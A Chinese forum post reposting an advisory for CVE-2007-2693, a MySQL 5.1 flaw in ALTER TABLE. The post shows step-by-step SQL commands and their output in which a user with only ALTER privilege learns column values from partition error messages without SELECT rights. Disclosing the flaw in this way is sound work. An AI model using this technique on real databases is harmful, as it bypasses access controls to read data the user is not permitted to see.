[讨论]导致MySQL Alter Table函数信息泄露的原因_MySQL, Oracle及数据库讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛_联动北方技术论坛  
网站首页 | 关于我们 | 服务中心 | 经验交流 | 公司荣誉 | 成功案例 | 合作伙伴 | 联系我们 |
联动北方-国内领先的云技术服务提供商
»  游客             当前位置:  论坛首页 »  自由讨论区 »  MySQL, Oracle及数据库讨论区 »
总帖数
1
每页帖数
101/1页1
返回列表
0
发起投票  发起投票 发新帖子
查看: 2716 | 回复: 0   主题: [讨论]导致MySQL Alter Table函数信息泄露的原因        下一篇 
landy
注册用户
等级:新兵
经验:61
发帖:72
精华:0
注册:2011-12-31
状态:离线
发送短消息息给landy 加好友    发送短消息息给landy 发消息
发表于: IP:您无权察看 2014-12-19 17:16:52 | [全部帖] [楼主帖] 楼主

MySQL Alter Table函数的相关信息出现泄露漏洞,如果你在使用MySQL Alter Table中出现相关的情况的话,你就可以通过以下的文章对其有个研究吧!

受影响系统:

MySQL AB MySQL 5.1.x < 5.1.18


不受影响系统:

MySQL AB MySQL 5.1.18


描述:BUGTRAQ ID: 24008

CVE(CAN) ID: CVE-2007-2693


MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL Alter Table功能实现上存在漏洞,能够以合法帐号登录到数据库系统的攻击者可能利用此漏洞非授权获取数据表相关的敏感信息。

如果用户对表格拥有ALTER权限的话源码天空,则即使没有SELECT权限也可以通过ALTER TABLE语句获得某些有关表格的敏感信息。例如,用户可以发布以下命令:

ALTER TABLE table1 PARTITION BY LIST (column1) (PARTITION x VALUES IN (0));


MySQL会返回错误消息:

"Table has no partition for value 18".


这样该用户就可以知道存在column1 = 18的列。

测试方法:

以root用户发布:

mysql> create table tu (s1 int);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into tu values (1);
Query OK, 1 row affected (0.00 sec)
mysql> grant alter on tu to molly@localhost;
Query OK, 0 rows affected (0.01 sec)


以molly@localhost发布:

mysql> select * from tu;
ERROR 1142 (42000): SELECT command denied to user 'molly'@'localhost' for table
'tu'
mysql> alter table tu partition by list (s1) (partition p1 values in (1));
Query OK, 1 row affected (0.05 sec)
Records: 1 Duplicates: 0 Warnings: 0
mysql> alter table tu partition by list (s1) (partition p1 values in (2));
ERROR 1513 (HY000): Table has no partition for value 1


以上的相关内容就是对MySQL Alter Table函数信息泄露漏洞的介绍,望你能有所收获。

--转自 北京联动北方科技有限公司




赞(0)    操作        顶端 
总帖数
1
每页帖数
101/1页1
返回列表
发新帖子
请输入验证码: 点击刷新验证码
您需要登录后才可以回帖 登录 | 注册
技术讨论